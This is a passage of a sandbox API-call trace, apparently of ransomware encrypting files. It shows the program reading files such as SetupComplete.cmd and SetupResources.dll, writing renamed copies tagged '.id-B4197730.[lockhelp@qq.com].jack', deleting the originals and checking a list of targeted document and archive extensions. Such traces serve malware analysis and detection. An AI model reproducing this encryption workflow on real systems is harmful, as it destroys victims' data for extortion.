0x236bcd8 [0195.718] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23789e0 [0195.718] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x23789e0, Size=0x20) returned 0x236b850 [0195.718] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.718] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.718] Wow64DisableWow64FsRedirection (in: OldValue=0x355ff50 | out: OldValue=0x355ff50*=0x0) returned 1 [0195.718] lstrlenW (lpString="kernel32.dll") returned 12 [0195.718] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0195.718] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.718] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b850 | out: hHeap=0x5e0000) returned 1 [0195.718] Sleep (dwMilliseconds=0x64) [0195.927] lstrcmpiW (lpString1=".cmd", lpString2=".jack") returned -1 [0195.927] lstrlenW (lpString="SetupComplete.cmd") returned 17 [0195.927] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.411] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=307) returned 1 [0196.411] CloseHandle (hObject=0x3ec) returned 1 [0196.411] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 0x20 [0196.411] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.412] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.412] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.412] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.412] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.412] GetLastError () returned 0x0 [0196.412] ReadFile (in: hFile=0x3ec, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x133, lpOverlapped=0x0) returned 1 [0196.433] WriteFile (in: hFile=0x3f0, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x140, lpOverlapped=0x0) returned 1 [0196.434] ReadFile (in: hFile=0x3ec, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.434] WriteFile (in: hFile=0x3f0, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf6, lpOverlapped=0x0) returned 1 [0196.454] SetEndOfFile (hFile=0x3f0) returned 1 [0196.454] CloseHandle (hObject=0x3f0) returned 1 [0196.461] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.461] SetEndOfFile (hFile=0x3ec) returned 1 [0196.462] CloseHandle (hObject=0x3ec) returned 1 [0196.462] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.462] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 1 [0196.462] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.462] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.462] lstrlenW (lpString=".doc") returned 4 [0196.462] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString=".docx") returned 5 [0196.463] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0196.463] lstrlenW (lpString=".pdf") returned 4 [0196.463] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString=".xls") returned 4 [0196.463] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString=".xlsx") returned 5 [0196.463] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0196.463] lstrlenW (lpString=".ppt") returned 4 [0196.463] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.463] lstrlenW (lpString=".zip") returned 4 [0196.463] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString=".rar") returned 4 [0196.463] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString=".bz2") returned 4 [0196.463] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0196.463] lstrlenW (lpString=".7z") returned 3 [0196.463] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0196.463] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.463] lstrlenW (lpString=".dbf") returned 4 [0196.463] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0196.463] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.463] lstrlenW (lpString=".1cd") returned 4 [0196.463] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0196.463] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.463] lstrlenW (lpString=".jpg") returned 4 [0196.463] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.464] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.464] lstrlenW (lpString=".doc") returned 4 [0196.464] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString=".docx") returned 5 [0196.464] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0196.464] lstrlenW (lpString=".pdf") returned 4 [0196.464] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString=".xls") returned 4 [0196.464] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString=".xlsx") returned 5 [0196.464] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0196.464] lstrlenW (lpString=".ppt") returned 4 [0196.464] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.464] lstrlenW (lpString=".zip") returned 4 [0196.464] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString=".rar") returned 4 [0196.464] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString=".bz2") returned 4 [0196.464] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0196.464] lstrlenW (lpString=".7z") returned 3 [0196.464] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0196.464] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.464] lstrlenW (lpString=".dbf") returned 4 [0196.464] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0196.464] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.465] lstrlenW (lpString=".1cd") returned 4 [0196.465] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0196.465] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0196.465] lstrlenW (lpString=".jpg") returned 4 [0196.465] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0196.465] lstrcmpiW (lpString1=".MARKER", lpString2=".jack") returned 1 [0196.465] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0196.465] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.030] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=0) returned 1 [0197.030] CloseHandle (hObject=0x3dc) returned 1 [0197.030] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.030] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.030] lstrlenW (lpString=".doc") returned 4 [0197.030] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0197.030] lstrlenW (lpString=".docx") returned 5 [0197.030] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0197.030] lstrlenW (lpString=".pdf") returned 4 [0197.030] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0197.030] lstrlenW (lpString=".xls") returned 4 [0197.030] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0197.030] lstrlenW (lpString=".xlsx") returned 5 [0197.030] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0197.030] lstrlenW (lpString=".ppt") returned 4 [0197.030] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0197.030] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.030] lstrlenW (lpString=".zip") returned 4 [0197.030] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0197.030] lstrlenW (lpString=".rar") returned 4 [0197.031] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString=".bz2") returned 4 [0197.031] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString=".7z") returned 3 [0197.031] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0197.031] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.031] lstrlenW (lpString=".dbf") returned 4 [0197.031] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.031] lstrlenW (lpString=".1cd") returned 4 [0197.031] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.031] lstrlenW (lpString=".jpg") returned 4 [0197.031] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.031] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.031] lstrlenW (lpString=".doc") returned 4 [0197.031] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString=".docx") returned 5 [0197.031] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0197.031] lstrlenW (lpString=".pdf") returned 4 [0197.031] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString=".xls") returned 4 [0197.031] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0197.031] lstrlenW (lpString=".xlsx") returned 5 [0197.031] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0197.031] lstrlenW (lpString=".ppt") returned 4 [0197.031] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0197.032] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.032] lstrlenW (lpString=".zip") returned 4 [0197.032] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0197.032] lstrlenW (lpString=".rar") returned 4 [0197.032] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0197.032] lstrlenW (lpString=".bz2") returned 4 [0197.032] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0197.032] lstrlenW (lpString=".7z") returned 3 [0197.032] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0197.032] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.032] lstrlenW (lpString=".dbf") returned 4 [0197.032] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0197.032] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.032] lstrlenW (lpString=".1cd") returned 4 [0197.032] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0197.032] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0197.032] lstrlenW (lpString=".jpg") returned 4 [0197.032] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0197.032] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.032] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.032] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.033] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=15704) returned 1 [0197.033] CloseHandle (hObject=0x3dc) returned 1 [0197.033] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 0x80 [0197.033] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.033] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.033] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.033] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.033] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.107] GetLastError () returned 0x0 [0197.107] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x3d58, lpOverlapped=0x0) returned 1 [0197.108] WriteFile (in: hFile=0x414, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x3d60, lpOverlapped=0x0) returned 1 [0197.110] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.110] WriteFile (in: hFile=0x414, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.110] SetEndOfFile (hFile=0x414) returned 1 [0197.110] CloseHandle (hObject=0x414) returned 1 [0197.113] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.113] SetEndOfFile (hFile=0x3dc) returned 1 [0197.114] CloseHandle (hObject=0x3dc) returned 1 [0197.115] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.115] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 1 [0197.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.115] lstrlenW (lpString=".doc") returned 4 [0197.115] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.115] lstrlenW (lpString=".docx") returned 5 [0197.115] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.115] lstrlenW (lpString=".pdf") returned 4 [0197.115] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.115] lstrlenW (lpString=".xls") returned 4 [0197.116] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.116] lstrlenW (lpString=".xlsx") returned 5 [0197.116] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.116] lstrlenW (lpString=".ppt") returned 4 [0197.116] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.116] lstrlenW (lpString=".zip") returned 4 [0197.116] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.116] lstrlenW (lpString=".rar") returned 4 [0197.116] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.116] lstrlenW (lpString=".bz2") returned 4 [0197.116] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.116] lstrlenW (lpString=".7z") returned 3 [0197.116] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.116] lstrlenW (lpString=".dbf") returned 4 [0197.116] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.116] lstrlenW (lpString=".1cd") returned 4 [0197.116] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.116] lstrlenW (lpString=".jpg") returned 4 [0197.116] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.117] lstrlenW (lpString=".doc") returned 4 [0197.117] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString=".docx") returned 5 [0197.117] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.117] lstrlenW (lpString=".pdf") returned 4 [0197.117] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString=".xls") returned 4 [0197.117] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString=".xlsx") returned 5 [0197.117] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.117] lstrlenW (lpString=".ppt") returned 4 [0197.117] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.117] lstrlenW (lpString=".zip") returned 4 [0197.117] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString=".rar") returned 4 [0197.117] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.117] lstrlenW (lpString=".bz2") returned 4 [0197.117] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.117] lstrlenW (lpString=".7z") returned 3 [0197.117] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.117] lstrlenW (lpString=".dbf") returned 4 [0197.117] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.117] lstrlenW (lpString=".1cd") returned 4 [0197.118] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.118] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 45 [0197.118] lstrlenW (lpString=".jpg") returned 4 [0197.118] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.118] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.118] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.118] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.118] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=15192) returned 1 [0197.118] CloseHandle (hObject=0x3dc) returned 1 [0197.118] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 0x80 [0197.118] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.119] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.119] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.119] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.119] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.138] GetLastError () returned 0x0 [0197.138] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x3b58, lpOverlapped=0x0) returned 1 [0197.140] WriteFile (in: hFile=0x414, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x3b60, lpOverlapped=0x0) returned 1 [0197.141] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.141] WriteFile (in: hFile=0x414, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.141] SetEndOfFile (hFile=0x414) returned 1 [0197.142] CloseHandle (hObject=0x414) returned 1 [0197.145] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.145] SetEndOfFile (hFile=0x3dc) returned 1 [0197.146] CloseHandle (hObject=0x3dc) returned 1 [0197.146] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.147] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 1 [0197.147] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.147] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.147] lstrlenW (lpString=".doc") returned 4 [0197.147] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.147] lstrlenW (lpString=".docx") returned 5 [0197.147] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.147] lstrlenW (lpString=".pdf") returned 4 [0197.147] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.147] lstrlenW (lpString=".xls") returned 4 [0197.147] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.147] lstrlenW (lpString=".xlsx") returned 5 [0197.147] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.147] lstrlenW (lpString=".ppt") returned 4 [0197.147] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.147] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.147] lstrlenW (lpString=".zip") returned 4 [0197.147] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.147] lstrlenW (lpString=".rar") returned 4 [0197.147] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.147] lstrlenW 